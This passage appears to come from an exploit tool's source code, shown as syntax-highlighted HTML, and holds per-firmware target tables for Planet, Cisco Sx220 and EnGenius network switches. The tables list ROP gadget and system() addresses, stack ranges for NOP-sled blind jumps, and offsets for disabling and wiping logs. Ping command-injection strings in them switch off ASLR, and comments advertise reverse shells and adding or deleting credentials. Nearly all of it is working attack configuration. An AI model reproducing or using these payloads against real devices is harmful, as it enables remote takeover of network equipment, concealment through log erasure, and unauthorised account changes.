														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42DA80</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42DA80</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x42C868</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeee04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">45</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token string">'218-7473'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Planet'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'2.0b160727'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'GS-4210-24T2S'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.planet.com.tw/en/product/GS-4210-24T2S'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E04C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484029c</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># Ping IPv4</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'ip=127.0.0.1 ; echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x424594</span><span class="token punctuation">,</span>	<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()</span>

						<span class="token comment"># traceroute</span>
						<span class="token comment">#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;&amp;tr_maxhop=30&amp;count=1',</span>
						<span class="token comment">#'verify_uri':'/tmp/check',</span>
						<span class="token comment">#'web_sys_ping_post':0x424DF4,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x48AA98</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x48D9F4</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x48D9F4</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x42E474</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x42E474</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x42D25c</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeee04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">45</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Cisco Systems, Inc.</span>
			<span class="token comment"># Sx220 Series</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'225-51973'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Cisco'</span><span class="token punctuation">,</span>						<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.1.3.1'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40F70C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998524</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484683c</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  cgi_sys_ping_set()</span>
						<span class="token comment"># Ping IPv4</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x43535C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;srvHost=127.0.0.1 ";echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;"&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>

														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  cgi_sys_tracert_set()</span>
						<span class="token comment"># traceroute</span>
						<span class="token comment">#'web_sys_ping_post':0x43567C,	# Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token comment">#'sys_ping_post_cmd':'&amp;srvHost=127.0.0.1 ";echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;"&amp;count=1',</span>
						<span class="token comment">#'sys_ping_post_check':'',</span>

						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x436FDC</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x436F34</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x436F88</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x434FB0</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x4350D8</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x434140</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token string">'225-60080'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Cisco'</span><span class="token punctuation">,</span>						<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.1.4.1'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40ffac</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998530</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x24847b6c</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  cgi_sys_ping_set()</span>
						<span class="token comment"># Ping IPv4</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x43535C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;srvHost=127.0.0.1 ";echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;"&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>

														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  cgi_sys_tracert_set()</span>
						<span class="token comment"># traceroute</span>
						<span class="token comment">#'web_sys_ping_post':0x43567C,	# Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token comment">#'sys_ping_post_cmd':'&amp;srvHost=127.0.0.1 ";echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;"&amp;count=1',</span>
						<span class="token comment">#'sys_ping_post_check':'',</span>

						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x436FDC</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x436F34</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x436F88</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x434FB0</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x4350D8</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x434140</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># EnGenius Technologies, Inc.</span>
			<span class="token comment"># EGS series</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'14044-509'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'EnGenius'</span><span class="token punctuation">,</span>						<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.05.20_150810-1754'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'EGS2110P'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.engeniustech.com/engenius-products/8-port-gigabit-smart-switch-egs2110p/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E12C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248405a0</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
